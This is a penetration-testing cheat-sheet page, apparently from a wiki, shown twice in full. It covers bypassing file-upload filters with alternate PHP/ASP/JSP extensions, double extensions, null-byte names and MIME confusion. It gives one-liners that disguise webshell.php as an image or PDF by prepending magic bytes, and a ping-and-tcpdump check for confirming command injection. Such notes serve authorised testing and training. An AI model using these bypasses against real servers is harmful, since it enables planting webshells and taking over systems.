User Endpoints

PreviousWeb Enumeration NextWeb Fuzzing

Last updated 3 days ago

User Endpoints

File Upload Filtering

Executable extensions

.php -> Standard extension for PHP scripts.

.php5 -> Used for PHP version 5 scripts.

.phtml -> PHP scripts with an alternative extension, often for compatibility or aesthetic reasons.

.pht -> Less common extension, used for PHP files; sometimes bypasses naive filters.

.phps -> Typically used for PHP source code highlighting.

.php3 -> Extension for older PHP 3 scripts; still valid in some configurations.

.asp -> Active Server Pages, Microsoft’s server-side scripting technology.

.aspx -> Advanced ASP.NET pages used for dynamic web content on Microsoft platforms.

.jsp -> Java Server Pages, used for dynamic web applications in Java environments.

Test filters

There are normally three ways a web server will check for valid file types by comparing them to an allow- or deny-list:
File extension :
- Double extensions:
  - .png.php, .jpg.php, .png.asp, .gif.jsp
- Null byte injection:
  - file.php%00.jpg, file.asp%00.png
Content-Type headers:
- Executable types:
  - application/x-php
  - application/x-sh
  - application/x-msdownload
  - application/x-python-code
- Image Types:
  - image/png,image/jpeg, image/gif, image/bmp, image/svg+xml
- MIME Confusion:
  - text/html instead of application/json
  - text/plain to trick servers.
(file signature)
- Online hex editor ->

PNG

echo "89504e470d0a1a0a" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.png

JPEG

echo "ffd8ff" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.jpg

GIF

echo "47494638" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.gif

PDF

echo "25504446" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.pdf

ZIP

echo "504b0304" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.zip

Check Input Sanitation/Validation

Submit especial characters in the request -> !@$%^&

In Linux IP addresses can be written in decimal and HEX, this can be useful if dots are blacklisted.

Prove the Injection

If you find a command injection, test whether the system can establish outbound connections to an external server:

ping+10.10.10.10

And wait for it with tcpdump:

tcpdump -i tun0 icmp

PreviousWeb Enumeration NextWeb Fuzzing

Last updated 3 days ago

File Upload Filtering

Executable extensions

.php -> Standard extension for PHP scripts.

.php5 -> Used for PHP version 5 scripts.

.phtml -> PHP scripts with an alternative extension, often for compatibility or aesthetic reasons.

.pht -> Less common extension, used for PHP files; sometimes bypasses naive filters.

.phps -> Typically used for PHP source code highlighting.

.php3 -> Extension for older PHP 3 scripts; still valid in some configurations.

.asp -> Active Server Pages, Microsoft’s server-side scripting technology.

.aspx -> Advanced ASP.NET pages used for dynamic web content on Microsoft platforms.

.jsp -> Java Server Pages, used for dynamic web applications in Java environments.

Test filters

There are normally three ways a web server will check for valid file types by comparing them to an allow- or deny-list:
File extension :
- Double extensions:
  - .png.php, .jpg.php, .png.asp, .gif.jsp
- Null byte injection:
  - file.php%00.jpg, file.asp%00.png
Content-Type headers:
- Executable types:
  - application/x-php
  - application/x-sh
  - application/x-msdownload
  - application/x-python-code
- Image Types:
  - image/png,image/jpeg, image/gif, image/bmp, image/svg+xml
- MIME Confusion:
  - text/html instead of application/json
  - text/plain to trick servers.
(file signature)
- Online hex editor ->

PNG

echo "89504e470d0a1a0a" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.png

JPEG

echo "ffd8ff" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.jpg

GIF

echo "47494638" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.gif

PDF

echo "25504446" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.pdf

ZIP

echo "504b0304" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.zip

Check Input Sanitation/Validation

Submit especial characters in the request -> !@$%^&

In Linux IP addresses can be written in decimal and HEX, this can be useful if dots are blacklisted.

Prove the Injection

If you find a command injection, test whether the system can establish outbound connections to an external server:

ping+10.10.10.10

And wait for it with tcpdump:

tcpdump -i tun0 icmp